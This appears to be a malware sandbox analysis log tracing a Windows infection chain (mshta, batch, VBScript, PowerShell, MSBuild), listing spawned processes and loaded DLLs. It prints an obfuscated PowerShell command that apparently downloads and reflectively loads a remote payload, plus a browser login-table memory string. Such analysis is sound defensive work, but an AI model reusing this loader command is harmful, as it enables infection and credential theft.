                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wscript.exe wscript //nologo "C:\Windows\Temp\octupole.vbs"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\SysWOW64\mshta.exe | File read: C:\Users\user\Desktop\desktop.ini
                        Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: MSBuild.exe, 00000008.00000002.2936900255.0000000002AE9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: unknown | Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\morninghtaaaafilex.hta"
                        Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Windows\Temp\misdivide.bat
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wscript.exe wscript //nologo "C:\Windows\Temp\octupole.vbs"
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1 /nobreak
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bl#Hg#a#Bh#HU#cwB0#GU#Z##g#D0#I##n#HQ#e#B0#C4#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##2#GU#cwBh#GI#Lw#3#DE#Lg#w#DI#Mg#u#DM#Lg#y#Dk#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#HM#bgBp#HQ#d#B5#C##PQ#g#CQ#ZQB4#Gg#YQB1#HM#d#Bl#GQ#I##t#HI#ZQBw#Gw#YQBj#GU#I##n#CM#Jw#s#C##JwB0#Cc#Ow#k#HM#a#Bv#HY#ZQBs#GE#cgBk#C##PQ#g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#DE#M##w#Dc#LgBm#Gk#b#Bl#G0#YQBp#Gw#LgBj#G8#bQ#v#GE#c#Bp#C8#ZgBp#Gw#ZQ#v#Gc#ZQB0#D8#ZgBp#Gw#ZQBr#GU#eQ#9#EU#UwBZ#FQ#aQBU#FI#MwBP#D##MwBF#DU#cQBy#E0#bgBJ#Hk#eQBX#HQ#WQBm#DU#TwBN#EY#VQ#w#G0#YQBr#Hg#TQB1#D##ZQBQ#HE#UgBS#Eo#TgBp#GM#TgBq#EM#Mw#2#GE#O#BU#DI#agBH#GY#VwBU#DY#RgBF#EI#ag#1#HM#JgBw#Gs#XwB2#Gk#Z##9#DM#N##y#Dg#M##z#GQ#MQBj#GM#N#Bl#DM#Yg#4#D##MQ#3#DQ#M##2#DY#Nw#w#DU#M##4#D##YQ#1#GU#Zg#n#Ds#J#Bv#HI#ZwBh#G4#bwBs#GE#bgB0#Gg#YQBu#HU#bQ#g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#J#Bz#HQ#aQBs#GI#ZQBu#GU#I##9#C##J#Bv#HI#ZwBh#G4#bwBs#GE#bgB0#Gg#YQBu#HU#bQ#u#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#Cg#J#Bz#Gg#bwB2#GU#b#Bh#HI#Z##p#Ds#J#Bn#GU#cgB1#G4#Z#Bp#GE#b#Bs#Hk#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FQ#ZQB4#HQ#LgBF#G4#YwBv#GQ#aQBu#Gc#XQ#6#Do#VQBU#EY#O##u#Ec#ZQB0#FM#d#By#Gk#bgBn#Cg#J#Bz#HQ#aQBs#GI#ZQBu#GU#KQ#7#CQ#ZQB0#Gg#bQBv#HY#bwBt#GU#cgBp#G4#ZQ#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#CQ#bwBy#Gk#ZwBp#G4#YQBy#Hk#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#bgBv#G4#YwBs#G8#d#Bo#Gk#bgBn#C##PQ#g#CQ#ZwBl#HI#dQBu#GQ#aQBh#Gw#b#B5#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQB0#Gg#bQBv#HY#bwBt#GU#cgBp#G4#ZQ#p#Ds#J#Bt#GU#d#Bv#G4#eQBt#HM#I##9#C##J#Bn#GU#cgB1#G4#Z#Bp#GE#b#Bs#Hk#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bv#HI#aQBn#Gk#bgBh#HI#eQ#p#Ds#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bt#GU#d#Bv#G4#eQBt#HM#I##t#Gc#d##g#CQ#bgBv#G4#YwBs#G8#d#Bo#Gk#bg
Bn#Ds#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#I##r#D0#I##k#GU#d#Bo#G0#bwB2#G8#bQBl#HI#aQBu#GU#LgBM#GU#bgBn#HQ#a##7#CQ#cwBw#GE#YwBp#GU#cg#g#D0#I##k#G0#ZQB0#G8#bgB5#G0#cw#g#C0#I##k#G4#bwBu#GM#b#Bv#HQ#a#Bp#G4#Zw#7#CQ#cwB1#GI#agBl#GM#d##g#D0#I##k#Gc#ZQBy#HU#bgBk#Gk#YQBs#Gw#eQ#u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#L##g#CQ#cwBw#GE#YwBp#GU#cg#p#Ds#J#Bn#HI#eQBs#Gw#dQBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBD#G8#bgB2#GU#cgB0#F0#Og#6#EY#cgBv#G0#QgBh#HM#ZQ#2#DQ#UwB0#HI#aQBu#Gc#K##k#HM#dQBi#Go#ZQBj#HQ#KQ#7#CQ#YgBh#GM#awBj#Gg#YQBu#G4#ZQBs#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#ZwBy#Hk#b#Bs#HU#cw#p#Ds#J#Bp#G4#YwBs#GU#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bz#G4#aQB0#HQ#eQ#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#TQBT#EI#dQBp#Gw#Z##n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Ck#KQ#='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::From
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Windows\Temp\misdivide.bat
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wscript.exe wscript //nologo "C:\Windows\Temp\octupole.vbs"
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1 /nobreak
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bl#Hg#a#Bh#HU#cwB0#GU#Z##g#D0#I##n#HQ#e#B0#C4#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##2#GU#cwBh#GI#Lw#3#DE#Lg#w#DI#Mg#u#DM#Lg#y#Dk#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#HM#bgBp#HQ#d#B5#C##PQ#g#CQ#ZQB4#Gg#YQB1#HM#d#Bl#GQ#I##t#HI#ZQBw#Gw#YQBj#GU#I##n#CM#Jw#s#C##JwB0#Cc#Ow#k#HM#a#Bv#HY#ZQBs#GE#cgBk#C##PQ#g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#DE#M##w#Dc#LgBm#Gk#b#Bl#G0#YQBp#Gw#LgBj#G8#bQ#v#GE#c#Bp#C8#ZgBp#Gw#ZQ#v#Gc#ZQB0#D8#ZgBp#Gw#ZQBr#GU#eQ#9#EU#UwBZ#FQ#aQBU#FI#MwBP#D##MwBF#DU#cQBy#E0#bgBJ#Hk#eQBX#HQ#WQBm#DU#TwBN#EY#VQ#w#G0#YQBr#Hg#TQB1#D##ZQBQ#HE#UgBS#Eo#TgBp#GM#TgBq#EM#Mw#2#GE#O#BU#DI#agBH#GY#VwBU#DY#RgBF#EI#ag#1#HM#JgBw#Gs#XwB2#Gk#Z##9#DM#N##y#Dg#M##z#GQ#MQBj#GM#N#Bl#DM#Yg#4#D##MQ#3#DQ#M##2#DY#Nw#w#DU#M##4#D##YQ#1#GU#Zg#n#Ds#J#Bv#HI#ZwBh#G4#bwBs#GE#bgB0#Gg#YQBu#HU#bQ#g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#J#Bz#HQ#aQBs#GI#ZQBu#GU#I##9#C##J#Bv#HI#ZwBh#G4#bwBs#GE#bgB0#Gg#YQBu#HU#bQ#u#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#Cg#J#Bz#Gg#bwB2#GU#b#Bh#HI#Z##p#Ds#J#Bn#GU#cgB1#G4#Z#Bp#GE#b#Bs#Hk#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FQ#ZQB4#HQ#LgBF#G4#YwBv#GQ#aQBu#Gc#XQ#6#Do#VQBU#EY#O##u#Ec#ZQB0#FM#d#By#Gk#bgBn#Cg#J#Bz#HQ#aQBs#GI#ZQBu#GU#KQ#7#CQ#ZQB0#Gg#bQBv#HY#bwBt#GU#cgBp#G4#ZQ#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#CQ#bwBy#Gk#ZwBp#G4#YQBy#Hk#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#bgBv#G4#YwBs#G8#d#Bo#Gk#bgBn#C##PQ#g#CQ#ZwBl#HI#dQBu#GQ#aQBh#Gw#b#B5#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQB0#Gg#bQBv#HY#bwBt#GU#cgBp#G4#ZQ#p#Ds#J#Bt#GU#d#Bv#G4#eQBt#HM#I##9#C##J#Bn#GU#cgB1#G4#Z#Bp#GE#b#Bs#Hk#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bv#HI#aQBn#Gk#bgBh#HI#eQ#p#Ds#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bt#GU#d#Bv#G4#eQBt#HM#I##t#Gc#d##g#CQ#bgBv#G4#YwBs#G8#d#Bo#Gk#bg
Bn#Ds#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#I##r#D0#I##k#GU#d#Bo#G0#bwB2#G8#bQBl#HI#aQBu#GU#LgBM#GU#bgBn#HQ#a##7#CQ#cwBw#GE#YwBp#GU#cg#g#D0#I##k#G0#ZQB0#G8#bgB5#G0#cw#g#C0#I##k#G4#bwBu#GM#b#Bv#HQ#a#Bp#G4#Zw#7#CQ#cwB1#GI#agBl#GM#d##g#D0#I##k#Gc#ZQBy#HU#bgBk#Gk#YQBs#Gw#eQ#u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#L##g#CQ#cwBw#GE#YwBp#GU#cg#p#Ds#J#Bn#HI#eQBs#Gw#dQBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBD#G8#bgB2#GU#cgB0#F0#Og#6#EY#cgBv#G0#QgBh#HM#ZQ#2#DQ#UwB0#HI#aQBu#Gc#K##k#HM#dQBi#Go#ZQBj#HQ#KQ#7#CQ#YgBh#GM#awBj#Gg#YQBu#G4#ZQBs#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#ZwBy#Hk#b#Bs#HU#cw#p#Ds#J#Bp#G4#YwBs#GU#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bz#G4#aQB0#HQ#eQ#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#TQBT#EI#dQBp#Gw#Z##n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Ck#KQ#='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mshtml.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msiso.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msimtf.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dataexchange.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d3d11.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dcomp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msls31.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d2d1.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dwrite.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: jscript9.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msxml3.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptsp.dll
